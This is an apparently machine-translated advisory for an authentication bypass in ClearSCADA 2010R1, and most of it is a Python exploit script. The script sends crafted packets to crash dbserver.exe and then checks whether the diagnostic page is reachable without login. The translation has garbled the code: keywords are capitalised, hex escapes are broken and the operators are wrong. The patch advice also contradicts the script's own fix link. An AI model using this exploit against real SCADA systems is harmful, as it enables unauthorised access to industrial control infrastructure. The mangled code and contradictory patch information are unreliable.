ClearSCADA 'dbserver.exe 'Remote Authentication Bypass Vulnerability

ClearSCADA 'dbserver.exe 'Remote Authentication Bypass Vulnerability

Release date:
Updated on:

Affected Systems:
ClearSCADA 2010R1
Description:
Bugtraq id: 72381

ClearSCADA is an integrated SCADA host platform.

ClearSCADA 2010r1and other users will enter the security mode when an exception occurs in 'dbserver.exe 'bmg. This allows remote users to access the diagnostic function without having to log on effectively, and there is a Remote Authentication Bypass Vulnerability in implementation, attackers can exploit this vulnerability to bypass authentication to obtain sensitive information.

<* Source: Jeremy Brown

Link: http://www.exploit-db.com/exploits/35924/
*>

Test method:

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
#! /Usr/bin/python
# Cs-auby.py
# ClearSCADA Remote Authentication Bypass Exploit
#
# Jeremy Brown
# [Jbrown3264/gmail]
#
# Oct 2010 (released Jan 2015)
#
# There is an authentication bypass vulnerability in ClearSCADA that can be
# Exploited by triggering an exception in dbserver.exe and taking advantage
# Of the way the program handles it.
#
# When an exception in occurs, ClearSCADA enters "Safe Mode". This exposes
# It's diagnostic functions to remote users without requiring a valid login
# As it wocould normally. A remote attacker cocould view senstive information
# And possibly modify functions of the server running on the affected host.
#
# This code triggers an exception in dbserver.exe and checks to see if you
# Can then access the diagnostic page without authentication.
#
# Tested on ClearSCADA 2010R1 running on Windows
#
# Fix information: http://ics-cert.us-cert.gov/advisories/ICSA-11-173-01
#

Import sys
Import socket
Import httplib
Import urllib
From time import sleep

Pkt_1 = (
"\ Xfb \ x0e \ x45 \ x06 \ x0e \ x00 \ x00 \ x00 \ x18 \ x00 \ x00 \ x00"
"\ X49 \ x00 \ x50 \ x00 \ x20 \ x00 \ x31 \ x00 \ x32 \ x00 \ x37 \ x00 \ x2e \ x00 \ x30 \ x00"
"\ X2e \ x00 \ x30 \ x00 \ x2e \ x00 \ x31 \ x00 \ x2c \ x00 \ x20 \ x00 \ x53 \ x00 \ x65 \ x00"
"\ X73 \ x00 \ x73 \ x00 \ x69 \ x00 \ x6f \ x00 \ x6e \ x00 \ x20 \ x00 \ x30 \ x00 \ x00 \ x00"
"\ X08 \ x00 \ x00 \ x00"
)

Pkt_2 = (
"\ X00 \ x00 \ x00 \ x00"
"\ X26 \ x00 \ x00 \ x00"
"\ X08 \ x00 \ x00 \ x00 \ x0f \ x00 \ x00 \ x00 \ x43 \ x00 \ x72 \ x00 \ x79 \ x00 \ x73 \ x00"
"\ X74 \ x00 \ x61 \ x00 \ x6c \ x00 \ x52 \ x00 \ x65 \ x00 \ x00 \ x00 \ x6f \ x00 \ x72 \ x00"
"\ X74 \ x00 \ x73 \ x00 \ x00 \ x00"
)

Pkt_3 = (# "Exception Occured"
"\ X00 \ x00 \ x00 \ x00 \ xd7 \ x01 \ x00 \ x00 \ x34 \ x00 \ x00 \ x00 \ x0d \ x00 \ x00 \ x00"
"\ X09 \ x00 \ x00 \ x00 \ x43 \ x00 \ x50 \ x00 \ x72 \ x00 \ x6f \ x00 \ x66 \ x00 \ x69 \ x00"
"\ X6c \ x00 \ x65 \ x00 \ x00 \ x00 \ x0e \ x00 \ x00 \ x00 \ x43 \ x00 \ x50 \ x00 \ x72 \ x00"
"\ X6f \ x00 \ x66 \ x00 \ x69 \ x00 \ x6c \ x00 \ x65 \ x00 \ x46 \ x00 \ x6c \ x00 \ x6f \ x00"
"\ X61 \ x00 \ x74 \ x00 \ x00 \ x00 \ x0e \ x00 \ x00 \ x00 \ x43 \ x00 \ x50 \ x00 \ x72 \ x00"
"\ X6f \ x00 \ x66 \ x00 \ x69 \ x00 \ x6c \ x00 \ x65 \ x00 \ x55 \ x00 \ x4c \ x00 \ x6f \ x00"
"\ X6e \ x00 \ x67 \ x00 \ x00 \ x00 \ x0d \ x00 \ x00 \ x00 \ x43 \ x00 \ x50 \ x00 \ x72 \ x00"
"\ X6f \ x00 \ x66 \ x00 \ x69 \ x00 \ x6c \ x00 \ x65 \ x00 \ x4c \ x00 \ x6f \ x00 \ x6e \ x00"
"\ X67 \ x00 \ x00 \ x00 \ x10 \ x00 \ x00 \ x00 \ x43 \ x00 \ x41 \ x00 \ x64 \ x00 \ xBB \ x00" # last w0rd
"\ X00 \ x42 \ x00 \ x49 \ x00 \ x54 \ x00 \ x56 \ x00 \ x61 \ x00 \ x6c \ x00 \ x75 \ x00 \ x65"
"\ X00 \ x4d \ x00 \ x61 \ x00 \ x00 \ x00 \ x00 \ x00 \ x11 \ x00 \ x00 \ x00 \ x43 \ x00 \ x41"
"\ X00 \ x64 \ x00 \ x76 \ x00 \ x42 \ x00 \ x59 \ x00 \ x54 \ x00 \ x45 \ x00 \ x56 \ x00 \ x61"
"\ X00 \ x6c \ x00 \ x75 \ x00 \ x65 \ x00 \ x4d \ x00 \ x61 \ x00 \ cross \ x00 \ x00 \ x00 \ x11"
"\ X00 \ x00 \ x00 \ x43 \ x00 \ x41 \ x00 \ x64 \ x00 \ x76 \ x00 \ x57 \ x00 \ x4f \ x00 \ x52"
"\ X00 \ x44 \ x00 \ x56 \ x00 \ x61 \ x00 \ x6c \ x00 \ x75 \ x00 \ x65 \ x00 \ x4d \ x00 \ x61"
"\ X00 \ x00 \ x00 \ x00 \ x11 \ x00 \ x00 \ x00 \ x00 \ x43 \ x00 \ x41 \ x00 \ x64 \ x00 \ x76"
"\ X00 \ x44 \ x00 \ x49 \ x00 \ x4e \ x00 \ x54 \ x00 \ x56 \ x00 \ x61 \ x00 \ x6c \ x00 \ x75"
"\ X00 \ x65 \ x00 \ x4d \ x00 \ x61 \ x00 \ x00 \ x00 \ x00 \ x00 \ x12 \ x00 \ x00 \ x00 \ x43"
"\ X00 \ x41 \ x00 \ x64 \ x00 \ x76 \ x00 \ x55 \ x00 \ x44 \ x00 \ x49 \ x00 \ x4e \ x00 \ x54"
"\ X00 \ x56 \ x00 \ x61 \ x00 \ x6c \ x00 \ x75 \ x00 \ x65 \ x00 \ x4d \ x00 \ x61 \ x00 \ cross"
"\ X00 \ x00 \ x00 \ x11 \ x00 \ x00 \ x00 \ x43 \ x00 \ x41 \ x00 \ x64 \ x00 \ x76 \ x00 \ x52"
"\ X00 \ x45 \ x00 \ x41 \ x00 \ x4c \ x00 \ x56 \ x00 \ x61 \ x00 \ x6c \ x00 \ x75 \ x00 \ x65"
"\ X00 \ x4d \ x00 \ x61 \ x00 \ x00 \ x00 \ x00 \ x00 \ x13 \ x00 \ x00 \ x00 \ x43 \ x00 \ x41"
"\ X00 \ x64 \ x00 \ x76 \ x00 \ x44 \ x00 \ x4f \ x00 \ x55 \ x00 \ x42 \ x00 \ x4c \ x00 \ x45"
"\ X00 \ x56 \ x00 \ x61 \ x00 \ x6c \ x00 \ x75 \ x00 \ x65 \ x00 \ x4d \ x00 \ x61 \ x00 \ cross"
"\ X00 \ x00 \ x00 \ x13 \ x00 \ x00 \ x00 \ x43 \ x00 \ x41 \ x00 \ x64 \ x00 \ x76 \ x00 \ x53"
"\ X00 \ x74 \ x00 \ x72 \ x00 \ x69 \ x00 \ x6e \ x00 \ x67 \ x00 \ x56 \ x00 \ x61 \ x00 \ x6c"
"\ X00 \ x75 \ x00 \ x65 \ x00 \ x4d \ x00 \ x61 \ x00 \ x00 \ x00 \ x00 \ x00 \ x0f \ x00 \ x00"
"\ X00 \ x43 \ x00 \ x43 \ x00 \ x72 \ x00 \ x79 \ x00 \ x73 \ x00 \ x74 \ x00 \ x61 \ x00 \ x6c"
"\ X00 \ x52 \ x00 \ x65 \ x00 \ x00 \ x00 \ x6f \ x00 \ x72 \ x00 \ x74 \ x00 \ x00 \ x00 \ x00"
)

Port = 5481
S_port = 443

Def do_ssl (target, port ):
Try:
Conn = httplib. HTTPSConnection (target, port)
Conn. _ http_vsn = 10
Conn. _ http_vsn_str = "HTTP/1.0"

Conn. request ("GET", "/diag/Info ")

Resp = conn. getresponse ()
Conn. close ()

Failed t Exception, error:
Print ("Error: % s" % error)
Return None

Return resp

Def main ():

If len (sys. argv )! = 2:
Print ("Usage: % s <target>" % sys. argv [0])
Sys. exit (0)

Target = sys. argv [1]
Cs = target, port

Print "Checking server status ..."

Resp = do_ssl (target, s_port)

If (resp = None ):
Return

If (resp. status = 301 ):
Print "Server status is normal. \ n"

Elif (resp. status == 200 ):
Print "Server is already in safe mode ."
Sys. exit (1)

Elif (resp. status! = 301) | (resp. status! = 200 )):
Print ("Server returned % d % s, server state unknown. \ nContinuing anyways .. \ n" % (resp. status, resp. reason ))

Print ("Sending packets to trigger exception... \ n ")

Try:
Sock = socket. socket (socket. AF_INET, socket. SOCK_STREAM)
Sock. connect (cs)

Sock. send (pkt_1)
Resp_1 = sock. recv (32)

Sock. send (pkt_2)
Resp_2 = sock. recv (32)

Sock. send (pkt_3)
Resp_3 = sock. recv (32)

Sock. close ()

Failed t Exception, error:
Print ("Error: % s" % error)
Return None

Print ("Finished, checking server status again ...")

Sleep (1)

Resp = do_ssl (target, s_port)

If (resp = None ):
Return

If (resp. status = 301 ):
Print ("Server status is still normal, maybe it's patched... \ n ")

Elif (resp. status == 200 ):
Print ("Server entered \" safe \ "mode :) \ n ")
Print ("Surf on over to https: // % s: 443/diag/Info to detail e" % target)

Elif (resp. status! = 301) | (resp. status! = 200 )):
Print ("Server returned % d % s, server state unknown." % (resp. status, resp. reason ))

If _ name _ = "_ main __":
Main ()

Suggestion:
Vendor patch:

ClearSCADA
----------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://www.clearscada.com/

This article permanently updates the link address: